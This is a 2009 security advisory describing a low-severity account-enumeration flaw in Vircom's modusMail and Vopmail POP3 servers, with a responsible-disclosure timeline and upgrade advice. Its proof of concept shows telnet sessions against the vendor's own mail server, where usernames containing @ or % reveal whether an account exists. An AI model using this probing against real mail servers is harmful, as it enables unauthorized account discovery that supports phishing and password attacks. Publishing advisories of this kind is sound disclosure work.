JAHx091 - Vircom vopmail / modusmail information disclosure

--------------------------------------------------------------------------------------------
20091106 - Justanotherhacker.com : Vircom vopmail / modusmail  information disclosure
JAHx091 - http://www.justanotherhacker.com/advisories/JAHx091.txt
--------------------------------------------------------------------------------------------

modusMail
All in one email security solution

The modusMail™ mail server provides all-in-one email services, messaging security and spam protection.
[ Taken from: http://www.vircom.com/en/products/modusmail/ ]


--- Vulnerability description ---
A conditional information disclosure exists in older versions of modusMail and Vopmail that will disclose whether an email account exists or not. The disclosure is conditional upon the presence of a @ or % character in the username. This is usually used when one mail system is responsible for the email of several domains. If the @ or % character was not present in the username the pop3 server would request a password before rejecting the login, as opposed to aborting the login attempt after receiving the user portion of the login.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Information disclosure
Severity: Low
Release: Responsible
CVE: None
Vendor: Vircom - http://www.vircom.com
Affected versions:
Modus mail <= 4.4.491
Probably all versions of Vopmail


--- Proof of Concept ---
~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready
<mailto:37819600.1156428713.245@vircom.com>
<37819600.1156428713.245@vircom.com>
user nosuchuserhere
+OK nosuchuserhere is welcome here
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.

~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready
<mailto:36899224.1156429893.504@vircom.com>
<36899224.1156429893.504@vircom.com>
user nosuchuser@nosuchhost.com
-ERR nosuchuser@nosuchhost.com not known
user nosuchuser%nosuchhost.com
-ERR nosuchuser%nosuchhost.com not known
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.



--- Solution ---
Upgrade to a more recent version


--- Disclosure time line ---
06-Nov-2009 - Public disclosure
15-Sep-2006 - New version of modusMail mitigate this
26-Aug-2009 - Vendor acknowledge problem
19-Aug-2006 - Vendor notified through email
No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.